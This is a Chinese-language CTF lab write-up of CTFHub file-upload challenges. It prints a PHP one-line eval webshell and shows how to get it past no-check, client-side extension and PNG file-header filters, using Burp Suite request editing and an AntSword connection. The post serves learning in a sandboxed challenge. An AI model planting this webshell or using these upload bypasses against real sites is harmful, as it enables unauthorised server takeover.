CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查
小白一个,如有错误请指正!
一、无验证
我们这次来到了文件上传模块了,这是一个无验证的文件上传,那我们直接上传一个一句话木马即可。
代码:
<?php@eval($_REQUEST["shell"]);
?>
1.我们在桌面创建一个shell.txt文件,输入代码后将后缀改成.php,然后将文件上传。
2.在这里我们得知上传的路径是:
http://challenge-620c59fde44f34b7.sandbox.ctfhub.com:10800/upload/shell.php
3.然后我们打开蚁剑,进行连接,先点击测试连接,提示连接成功后我们点击添加
附蚁剑下载地址:https://github.com/AntSwordProject/
4.这里我们直接双击添加成功的链接,查看文件
5.点击进来就发现flag了,点开里面就是falg了
二、前端验证
我们先照常上传我们的shell,php文件,然后发现不允许上传,那我们用F12大法看一下。
在这里我们发现有一个前端认证,而且认证的代码也给我们了,大概意思就是除了后缀名为jpg、png 、gif格式的文件之外,其他文件不允许上传。
解题思路
我们可以先将文件名改为shell.jpg,然后使用Burpsuite进行抓包,修改数据包的内容,将我们的文件名改回shell.php,再用蚁剑进行连接就可以了。
实现步骤:
1.用Burpsuite进行抓包,在红框位置修改文件名,发送数据包查看返回内容。我们可以发现文件上传成功了,没有被拦截。
2.打开蚁剑,填写url和密码进行连接。
3.连接成功,翻找flag。
4.成功拿下flag。
ctfhub{a45284a7a153ea87becca3e1}
三、文件头检查
1.文件头检查我们需要下载winhex:
http://www.x-ways.net/winhex.zip
2.我们从winhex中打开我们的一句话木马shell.php,为它添加一个PNG的文件头89504E47
3. 剪贴板格式选择 ASCLL Hex
4.剩下的就是用burp抓包改木马文件后缀和蚁剑连接后去flag了
参考资料:
https://blog.csdn.net/weixin_45556441/article/details/115732738
CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查相关推荐
- WEB文件上传之JQuery ajaxfileupload插件使用(二)
1.JQuery ajaxfileupload插件使用准备 下载地址: http://www.phpletter.com/DOWNLOAD/ 2.原理分析 ajaxfileupload也是利用ifra ...
- web文件上传(一)--文件上传与json上传区别及方法
Web文件上传方法总结大全 上传文件与与上传数据区别 上传数据主要指json等简单字符串,上传文件指的是上传word.excel图片等.在上传数据的时候enctype默认为第一个application ...
- Servlet笔记十(文件上传和下载)
本栏博客目录 Serlvet笔记一(Servlet基础) Servlet笔记二(请求和响应) Servlet笔记三(会话及其会话技术) Servlet笔记四(JSP技术) Servlet笔记五(EL表 ...
- web文件上传-0x00漏洞
文件上传-0x00漏洞 题目:2016全国大学生信息安全竞赛-web文件上传 原理 0x00漏洞:也称为%00阻断漏洞,0x00漏洞常见于Apache服务器后缀名称解析漏洞,不管文件最后后缀为什么,只 ...
- java web文件上传所需要的commons-fileupload和 commons-io jar包
文章目录 一.官网获取 二.百度网盘分享 三.分享与热爱 一.官网获取 学习java web文件上传时需要用到两个必备的jar包: commons-fileupload commons-io jar ...
- java web 上传附件_JAVA WEB文件上传步骤
JAVA WEB文件上传步骤如下: 实现 Web 开发中的文件上传功能,两个操作:在 Web 页面添加上传输入项,在 Servlet 中读取上传文件的数据并保存在本地硬盘中. 1.Web 端上传文件. ...
- web文件上传下载原理浅析
一.web文件上传浅析 现在有很多Web程序都有上传功能,实现上传功能的组件或框架也很多,如基于java的Commons FileUpload.还有Struts1.x和Struts2中带的上传文件功能 ...
- CTFHub web 文件上传- 无限制
CTFHub 文件上传 - 无限制 上传一个含一句话木马的.jpg文件,抓包后将.jpg改为.php后上传,go一下即可 然后再之前的路径后面加上upload/.php的路径,就可以了 这是我们上传的 ...
- 文件上传——无验证(ctfhub 文件上传-无限制)
文件上传漏洞最简单的就是上传小马,即一句话木马. 例如: <?php @eval($_POST['hacker']);?> 在这简单的一句话中,将会引发巨大的影响,eval函数将会把括号里 ...
最新文章
- 新转机!2020年想裸辞的程序员们注意了
- 替换python字典中的key值
- [转] Apache日志分析常用Shell命令
- 0118——RTLabel和正则表达式
- pb 调用虹软_python调用虹软2.0
- linux 或者xshell等工具输入错误命令 删除键显示^H 解决办法
- 计算机网络技术基础教学内容,计算机网络技术基础
- IDEA用maven整合ssh框架
- 服务器虚拟机镜像怎么设置ip,风云OL虚拟机镜像一键服务端+配套客户端+启动教程+GM命令+IP修改等...
- swfobject.js
- 2022-2027年中国玩偶行业市场全景评估及发展战略规划报告
- 机电工程专业成功转行IT的真实经历
- 菜鸟IT技术杂谈(一)——从多任务系统原理说起
- 计算机数控入门,数控车床入门教程 如何进入CNC加工过程
- 【虚幻引擎】实现类LOL缓慢扣血血条
- int,Uint,uint16的区别及用处
- 服务器虚拟化iecs,中兴通讯中标中国电信2012云计算集采
- 中国企业实施ERP的难点攻略
- ABBA(组合数学/dp)
- 读写文本文件-StreamReader和StreamWriter
热门文章
- 0320-复利计算器代码
- 微信号开通检测软件选择需谨慎
- 山东大学程序设计思维与实践 四月模拟:TT与可怜的猫
- UEStudio中进行文件编码转换
- PPPoE获取到32位掩码的研究
- 这就是裸金属服务器?
- android组件圆角,Android实现圆角控件
- Mirror 镜像站点的使用
- python如何定义一个函数选择题_Python逻辑题(以下10个选择题有唯一答案,请编写自定义函数judge遍历答案列表并报告正确答案),python,道,汇报...
- 活动星投票奋斗青春,使命必达网络评选微信的投票方式线上免费投票